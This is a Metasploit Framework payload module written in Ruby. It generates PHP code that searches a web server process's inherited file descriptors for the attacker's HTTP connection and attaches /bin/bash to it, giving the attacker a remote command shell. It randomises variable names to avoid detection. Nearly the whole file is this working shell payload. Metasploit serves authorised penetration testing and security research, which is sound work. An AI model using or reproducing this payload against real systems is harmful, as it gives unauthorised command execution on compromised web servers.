metasploit-framework/modules/payloads/singles/php/shell_findsock.rb

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##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
CachedSize = :dynamic
include Msf::Payload::Single
include Msf::Payload::Php
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'PHP Command Shell, Find Sock',
'Description' => %Q{
Spawn a shell on the established connection to
the webserver. Unfortunately, this payload
can leave conspicuous evil-looking entries in the
apache error logs, so it is probably a good idea
to use a bind or reverse shell unless firewalls
prevent them from working. The issue this
payload takes advantage of (CLOEXEC flag not set
on sockets) appears to have been patched on the
Ubuntu version of Apache and may not work on
other Debian-based distributions. Only tested on
Apache but it might work on other web servers
that leak file descriptors to child processes.
},
'Author' => [ 'egypt' ],
'License' => BSD_LICENSE,
'Platform' => 'php',
'Handler' => Msf::Handler::FindShell,
'Session' => Msf::Sessions::CommandShell,
'Arch' => ARCH_PHP
))
end
def php_findsock
var_cmd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
var_fd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
var_out = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
shell = <<END_OF_PHP_CODE
#{php_preamble}
print("<html><body>");
flush();
function mysystem(#{var_cmd}){
#{php_system_block(cmd_varname: var_cmd, output_varname: var_out)}
return #{var_out};
}
#{var_fd} = 13;
for ($i = 3; $i < 50; $i++) {
$foo = mysystem("/bin/bash 2>/dev/null <&$i -c 'echo $i'");
if ($foo != $i) {
#{var_fd} = $i - 1;
break;
}
}
print("</body></html>\n\n");
flush();
#{var_cmd} = "/bin/bash <&#{var_fd} >&#{var_fd} 2>&#{var_fd}";
mysystem(#{var_cmd});
END_OF_PHP_CODE
return shell
end
#
# Constructs the payload
#
def generate(_opts = {})
return php_findsock
end
end